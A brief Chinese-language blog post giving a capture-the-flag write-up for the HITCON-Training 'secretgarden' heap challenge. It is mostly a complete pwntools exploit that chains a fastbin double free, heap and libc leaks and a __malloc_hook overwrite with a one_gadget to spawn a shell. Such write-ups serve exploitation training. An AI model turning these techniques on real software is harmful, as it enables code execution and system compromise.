MENU

Catalog

    HITCON-Training lab12 secretgarden fastbin attack

    December 17, 2020 • Read: 874 • Pwn

    本来是在看Angelboy的视频来着,看到他有这个例题于是我就去github找,做完了才发现原来lab虽然序号一样,但是好像主题不是同一个。
    阴差阳错做了这题,既然做了就放出来吧,不过我的写法不是最优写法。
    题目中也有magic函数,但是我没用。

    from pwn import *
    from LibcSearcher import *
    context.log_level = "debug"
    r = process('./secretgarden')
    #r = remote("training.pwnable.tw", 11012)
    def choice(idx):
        r.sendlineafter("Your choice : ", str(idx))
    
    def add(size, name = 'a', color = 'a'):
        choice(1)
        r.sendlineafter("Length of the name :", str(size))
        r.sendafter("The name of flower :", name)
        r.sendlineafter("The color of the flower :", color)
    
    def visit():
        choice(2)
    
    def delete(idx):
        choice(3)
        r.sendlineafter("Which flower do you want to remove from the garden:", str(idx))
    
    def clean():
        choice(4)
    
    add(0x68) #0
    add(0x68) #1
    add(0x68) #2
    
    #double free
    delete(0)
    delete(1)
    delete(0)
    
    #fastbin attack & change size to 0xA1 for unsorted bin
    add(0x68, '\x40') #3 == 0
    add(0x68) #4 == 1
    visit()
    r.recvuntil('flower[3] :')
    heap_addr = u64(r.recvuntil('\n')[:-1].ljust(8, '\x00'))
    log.success('heap_addr: ' + hex(heap_addr))
    add(0x68, p64(heap_addr + 0x60) + 'b' * 0x50 + p64(0x71) + p64(heap_addr + 0x60)) #5
    add(0x68, '\x00') #6
    add(0x68, p64(0) + p64(0x31) + p64(0) + p64(heap_addr + 0xB0) + '\x11' * 0x18 + p64(0xA1)) #7
    delete(1)
    add(0x68, p64(0) + p64(0x31) + p64(1) + p64(heap_addr + 0xE0)) #8
    visit()
    
    #unsorted bin leak
    main_arena_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 88
    log.success('main_arena_addr: ' + hex(main_arena_addr))
    malloc_hook_addr = main_arena_addr - 0x10
    log.success('malloc_hook_addr: ' + hex(malloc_hook_addr))
    libc = LibcSearcher('__malloc_hook', malloc_hook_addr)
    libc_base = malloc_hook_addr - libc.dump('__malloc_hook')
    log.success('libc_base: ' + hex(libc_base))
    one = [0x45226, 0x4527a, 0xf0364, 0xf1207]
    one_gadget = libc_base + one[2]
    log.success('one_gadget: ' + hex(one_gadget))
    
    #getshell
    add(0x68) #9
    add(0x68) #10
    delete(9)
    delete(10)
    delete(9)
    add(0x68, p64(malloc_hook_addr - 0x23))
    add(0x68)
    add(0x68)
    add(0x68, 'a' * 0x13 + p64(one_gadget))
    delete(9)
    delete(9)
    
    r.interactive()
    Archives QR Code
    QR Code for this page
    Tipping QR Code